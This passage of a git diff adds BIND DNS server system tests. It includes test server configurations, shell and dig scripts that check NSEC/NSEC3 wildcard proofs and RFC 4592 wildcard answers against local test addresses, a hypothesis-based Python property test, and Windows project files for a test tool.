+/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; + forward only; + forwarders { 10.53.0.2; }; +}; + +include "../ns1/trusted.conf"; +include "../ns1/private.nsec.conf"; +include "../ns1/private.nsec3.conf"; diff --git a/bin/tests/system/wildcard/ns5/named.conf.in b/bin/tests/system/wildcard/ns5/named.conf.in new file mode 100644 index 0000000..1cd358d --- /dev/null +++ b/bin/tests/system/wildcard/ns5/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +include "../ns1/trusted.conf"; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/wildcard/setup.sh b/bin/tests/system/wildcard/setup.sh new file mode 100644 index 0000000..3d20b48 --- /dev/null +++ b/bin/tests/system/wildcard/setup.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +(cd ns1 && $SHELL -e sign.sh) diff --git a/bin/tests/system/wildcard/tests.sh b/bin/tests/system/wildcard/tests.sh new file mode 100644 index 0000000..f93150c --- /dev/null +++ b/bin/tests/system/wildcard/tests.sh @@ -0,0 +1,272 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}" + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned auth ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec +norec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i 'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned non-validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i 'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns2.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep -i 'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns3.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned validating + CD ($n)" +ret=0 +$DIG $DIGOPTS +cd a b.wild.nsec @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep -i 'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns5.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns5.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "checking that returned NSEC wildcard non-existence proof validates ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep -i 'a\.wild\.nsec\..*NSEC.*nsec\..*NSEC' dig.out.ns4.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC wildcard non-existence proof is returned private, validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.private.nsec @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep -i 'a\.wild\.private\.nsec\..*NSEC.*private\.nsec\..*NSEC' dig.out.ns3.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that returned NSEC wildcard non-existence proof for private zone validates ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.private.nsec @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep -i 'a\.wild\.private\.nsec\..*NSEC.*private\.nsec\..*NSEC' dig.out.ns4.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned auth ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec3 +norec @10.53.0.1 > dig.out.ns1.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned non-validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec3 @10.53.0.2 > dig.out.ns2.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns2.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns3.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns3.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned validating + CD ($n)" +ret=0 +$DIG $DIGOPTS +cd a b.wild.nsec3 @10.53.0.5 > dig.out.ns5.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns5.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns5.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that returned NSEC3 wildcard non-existence proof validates ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.nsec3 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep -i 'O3TJ8D9AJ54CBTFCQCJ3QK49CH7SF6H9\.nsec3\..*V5DLFB6UJNHR94LQ61FO607KGK12H88A' dig.out.ns4.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that NSEC3 wildcard non-existence proof is returned private, validating ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.private.nsec3 @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep -i 'UDBSP4R8OUOT6HSO39VD8B5LMOSHRD5N\.private\.nsec3\..*NSEC3.*ASDRUIB7GO00OR92S5OUGI404LT27RNU' dig.out.ns3.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that returned NSEC3 wildcard non-existence proof for private zone validates ($n)" +ret=0 +$DIG $DIGOPTS a b.wild.private.nsec3 @10.53.0.4 > dig.out.ns4.test$n || ret=1 +grep -i 'UDBSP4R8OUOT6HSO39VD8B5LMOSHRD5N\.private\.nsec3\..*NSEC3.*ASDRUIB7GO00OR92S5OUGI404LT27RNU' dig.out.ns4.test$n > /dev/null || ret=1 +grep -i 'flags:.* ad[ ;]' dig.out.ns4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking RFC 4592 responses ..." + +n=`expr $n + 1` +echo_i "checking RFC 4592: host3.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host3.example. MX IN > dig.out.ns1.test$n || ret=1 +grep '^host3.example..*IN.MX.10 host1.example.' dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: host3.example. QTYPE=A, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host3.example. A IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: foo.bar.example. QTYPE=TXT, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 foo.bar.example TXT IN > dig.out.ns1.test$n || ret=1 +grep '^foo.bar.example..*IN.TXT."this is a wildcard"' dig.out.ns1.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: host1.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host1.example MX IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: host1.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host1.example MX IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: sub.*.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 "sub.*.example." MX IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: _telnet._tcp.host1.example. QTYPE=SRV, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 _telnet._tcp.host1.example. SRV IN > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: host.subdel.example. QTYPE=A, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 host.subdel.example A IN > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +grep "AUTHORITY: 2," dig.out.ns1.test$n > /dev/null || ret=1 +grep "subdel.example..*IN.NS.ns.example.com." dig.out.ns1.test$n > /dev/null || ret=1 +grep "subdel.example..*IN.NS.ns.example.net." dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking RFC 4592: ghost.*.example. QTYPE=MX, QCLASS=IN ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 "ghost.*.example" MX IN > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.ns1.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check wild card expansions by code point ($n)" +ret=0 +i=0 +while test $i -lt 256 +do + x=`expr 00$i : '.*\(...\)$'` + $DIG $DIGOPTS @10.53.0.1 "\\$x.example" TXT > dig.out.ns1.$x.test$n + if test $i -le 32 -o $i -ge 127 + then + grep '^\\'"$x"'\.example\..*TXT.*"this is a wildcard"$' dig.out.ns1.$x.test$n > /dev/null || { echo_i "code point $x failed" ; ret=1; } + # "=34 $=36 (=40 )=41 .=46 ;=59 \=92 @=64 + elif test $i -eq 34 -o $i -eq 36 -o $i -eq 40 -o $i -eq 41 -o \ + $i -eq 46 -o $i -eq 59 -o $i -eq 64 -o $i -eq 92 + then + case $i in + 34) a='"';; + 36) a='$';; + 40) a='(';; + 41) a=')';; + 46) a='\.';; + 59) a=';';; + 64) a='@';; + 92) a='\\';; + *) a=''; echo_i "code point $x failed" ; ret=1 ;; + esac + grep '^\\'"$a"'\.example.*.*TXT.*"this is a wildcard"$' dig.out.ns1.$x.test$n > /dev/null || { echo_i "code point $x failed" ; ret=1; } + else + grep '^\\' dig.out.ns1.$x.test$n && { echo_i "code point $x failed" ; ret=1; } + fi + i=`expr $i + 1` +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/wildcard/tests_wildcard.py b/bin/tests/system/wildcard/tests_wildcard.py new file mode 100755 index 0000000..66166f2 --- /dev/null +++ b/bin/tests/system/wildcard/tests_wildcard.py @@ -0,0 +1,112 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +""" +Example property-based test for wildcard synthesis. +Verifies that otherwise-empty zone with single wildcard record * A 192.0.2.1 +produces synthesized answers for <random_label>.test. A, and returns NODATA for +<random_label>.test. when rdtype is not A. + +Limitations - untested properties: + - expansion works with multiple labels + - asterisk in qname does not cause expansion + - empty non-terminals prevent expansion + - or more generally any existing node prevents expansion + - DNSSEC record inclusion + - possibly others, see RFC 4592 and company + - content of authority & additional sections + - flags beyond RCODE + - special behavior of rdtypes like CNAME +""" +import pytest + +pytest.importorskip("dns") +import dns.message +import dns.name +import dns.query +import dns.rcode +import dns.rdataclass +import dns.rdatatype +import dns.rrset + +pytest.importorskip("hypothesis") +from hypothesis import given +from hypothesis.strategies import binary, integers + + +# labels of a zone with * A 192.0.2.1 wildcard +WILDCARD_ZONE = ("allwild", "test", "") +WILDCARD_RDTYPE = dns.rdatatype.A +WILDCARD_RDATA = "192.0.2.1" +IPADDR = "10.53.0.1" +TIMEOUT = 5 # seconds, just a sanity check + + +# Helpers +def is_nonexpanding_rdtype(rdtype): + """skip meta types to avoid weird rcodes caused by AXFR etc.; RFC 6895""" + return not ( + rdtype == WILDCARD_RDTYPE + or dns.rdatatype.is_metatype(rdtype) # known metatypes: OPT ... + or 128 <= rdtype <= 255 + ) # unknown meta types + + +def tcp_query(where, port, qname, qtype): + querymsg = dns.message.make_query(qname, qtype) + assert len(querymsg.question) == 1 + return querymsg, dns.query.tcp(querymsg, where, port=port, timeout=TIMEOUT) + + +def query(where, port, label, rdtype): + labels = (label,) + WILDCARD_ZONE + qname = dns.name.Name(labels) + return tcp_query(where, port, qname, rdtype) + + +# Tests +@given( + label=binary(min_size=1, max_size=63), + rdtype=integers(min_value=0, max_value=65535).filter(is_nonexpanding_rdtype), +) +def test_wildcard_rdtype_mismatch(label, rdtype, named_port): + """any label non-matching rdtype must result in to NODATA""" + check_answer_nodata(*query(IPADDR, named_port, label, rdtype)) + + +def check_answer_nodata(querymsg, answer): + assert querymsg.is_response(answer), str(answer) + assert answer.rcode() == dns.rcode.NOERROR, str(answer) + assert answer.answer == [], str(answer) + + +@given(label=binary(min_size=1, max_size=63)) +def test_wildcard_match(label, named_port): + """any label with maching rdtype must result in wildcard data in answer""" + check_answer_noerror(*query(IPADDR, named_port, label, WILDCARD_RDTYPE)) + + +def check_answer_noerror(querymsg, answer): + assert querymsg.is_response(answer), str(answer) + assert answer.rcode() == dns.rcode.NOERROR, str(answer) + assert len(querymsg.question) == 1, str(answer) + expected_answer = [ + dns.rrset.from_text( + querymsg.question[0].name, + 300, # TTL, ignored by dnspython comparison + dns.rdataclass.IN, + WILDCARD_RDTYPE, + WILDCARD_RDATA, + ) + ] + assert answer.answer == expected_answer, str(answer) diff --git a/bin/tests/system/win32/bigkey.vcxproj.filters.in b/bin/tests/system/win32/bigkey.vcxproj.filters.in new file mode 100644 index 0000000..1b592a6 --- /dev/null +++ b/bin/tests/system/win32/bigkey.vcxproj.filters.in @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\rsabigexponent\bigkey.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/bigkey.vcxproj.in b/bin/tests/system/win32/bigkey.vcxproj.in new file mode 100644 index 0000000..7b4d59b --- /dev/null +++ b/bin/tests/system/win32/bigkey.vcxproj.in @@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{61F9D673-EB5C-47A5-8907-24E034C75EF8}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>bigkey</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\rsabigexponent\bigkey.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/bigkey.vcxproj.user b/bin/tests/system/win32/bigkey.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/bigkey.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
